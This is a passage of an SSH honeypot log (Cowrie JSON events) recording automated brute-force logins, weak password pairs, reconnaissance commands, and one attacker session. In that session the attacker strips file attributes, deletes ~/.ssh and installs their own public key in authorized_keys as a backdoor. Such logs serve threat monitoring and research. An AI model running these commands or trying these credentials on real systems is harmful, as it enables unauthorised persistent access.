cdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:45.153752Z","src_ip":"212.227.125.160","session":"f1261ba6cdc6"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer","message":"login attempt [observer/observer] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:45.292073Z","src_ip":"212.227.125.160","session":"f1261ba6cdc6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:46.339052Z","src_ip":"212.227.125.160","session":"f1261ba6cdc6"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.66","src_port":33340,"dst_ip":"1.2.3.4","dst_port":22,"session":"037885691a1b","protocol":"ssh","message":"New connection: 103.31.39.66:33340 (1.2.3.4:22) [session: 037885691a1b]","sensor":"my-vps","timestamp":"2025-08-26T22:12:48.418549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:12:48.421849Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:12:48.716733Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.login.success","username":"root","password":"147258369","message":"login attempt [root/147258369] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:12:49.899518Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:12:50.573067Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:12:50.573860Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T22:12:50.574848Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:50.871474Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51040,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ded25b612d4","protocol":"ssh","message":"New connection: 212.227.125.160:51040 (1.2.3.4:22) [session: 2ded25b612d4]","sensor":"my-vps","timestamp":"2025-08-26T22:12:50.958113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:50.959033Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.003287Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.145349Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:12:51.300876Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.301588Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.347143Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.348270Z","src_ip":"212.227.125.160","session":"2ded25b612d4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:12:51.617060Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.617743Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.915477Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:51.916390Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.66","src_port":48462,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a6a8000060d","protocol":"ssh","message":"New connection: 103.31.39.66:48462 (1.2.3.4:22) [session: 1a6a8000060d]","sensor":"my-vps","timestamp":"2025-08-26T22:12:52.211604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:12:52.212634Z","src_ip":"103.31.39.66","session":"1a6a8000060d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:12:52.508624Z","src_ip":"103.31.39.66","session":"1a6a8000060d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:53.734349Z","src_ip":"103.31.39.66","session":"1a6a8000060d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:55.033296Z","src_ip":"103.31.39.66","session":"1a6a8000060d"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.66","src_port":48468,"dst_ip":"1.2.3.4","dst_port":22,"session":"fccfc52bca66","protocol":"ssh","message":"New connection: 103.31.39.66:48468 (1.2.3.4:22) [session: fccfc52bca66]","sensor":"my-vps","timestamp":"2025-08-26T22:12:55.326705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:12:55.327374Z","src_ip":"103.31.39.66","session":"fccfc52bca66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T22:12:55.622436Z","src_ip":"103.31.39.66","session":"fccfc52bca66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46428,"dst_ip":"1.2.3.4","dst_port":22,"session":"f087bdf22cc4","protocol":"ssh","message":"New connection: 212.227.125.160:46428 (1.2.3.4:22) [session: f087bdf22cc4]","sensor":"my-vps","timestamp":"2025-08-26T22:12:56.488090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:56.515048Z","src_ip":"212.227.125.160","session":"f087bdf22cc4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:12:56.537508Z","src_ip":"212.227.125.160","session":"f087bdf22cc4"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234qwer","message":"login attempt [test/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T22:12:56.740014Z","src_ip":"212.227.125.160","session":"f087bdf22cc4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:12:56.844475Z","src_ip":"103.31.39.66","session":"fccfc52bca66"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:57.140709Z","src_ip":"103.31.39.66","session":"fccfc52bca66"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:57.141633Z","src_ip":"103.31.39.66","session":"037885691a1b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:12:57.791883Z","src_ip":"212.227.125.160","session":"f087bdf22cc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41780,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e78d34d3b46","protocol":"ssh","message":"New connection: 212.227.125.160:41780 (1.2.3.4:22) [session: 5e78d34d3b46]","sensor":"my-vps","timestamp":"2025-08-26T22:13:01.956211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:13:01.999135Z","src_ip":"212.227.125.160","session":"5e78d34d3b46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:13:02.043483Z","src_ip":"212.227.125.160","session":"5e78d34d3b46"}
{"eventid":"cowrie.login.failed","username":"vmail","password":"vmail","message":"login attempt [vmail/vmail] failed","sensor":"my-vps","timestamp":"2025-08-26T22:13:02.336752Z","src_ip":"212.227.125.160","session":"5e78d34d3b46"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:03.391192Z","src_ip":"212.227.125.160","session":"5e78d34d3b46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37204,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c9074243df9","protocol":"ssh","message":"New connection: 212.227.125.160:37204 (1.2.3.4:22) [session: 7c9074243df9]","sensor":"my-vps","timestamp":"2025-08-26T22:13:07.150246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:13:07.159369Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:13:07.539551Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.login.success","username":"root","password":"Ab123456","message":"login attempt [root/Ab123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:13:08.226826Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:13:08.852528Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:13:08.853472Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:09.019670Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:13:09.020874Z","src_ip":"212.227.125.160","session":"7c9074243df9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":7330,"dst_ip":"1.2.3.4","dst_port":22,"session":"9867220cf884","protocol":"ssh","message":"New connection: 213.209.150.239:7330 (1.2.3.4:22) [session: 9867220cf884]","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.597441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T22:13:16.606726Z","src_ip":"213.209.150.239","session":"9867220cf884"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh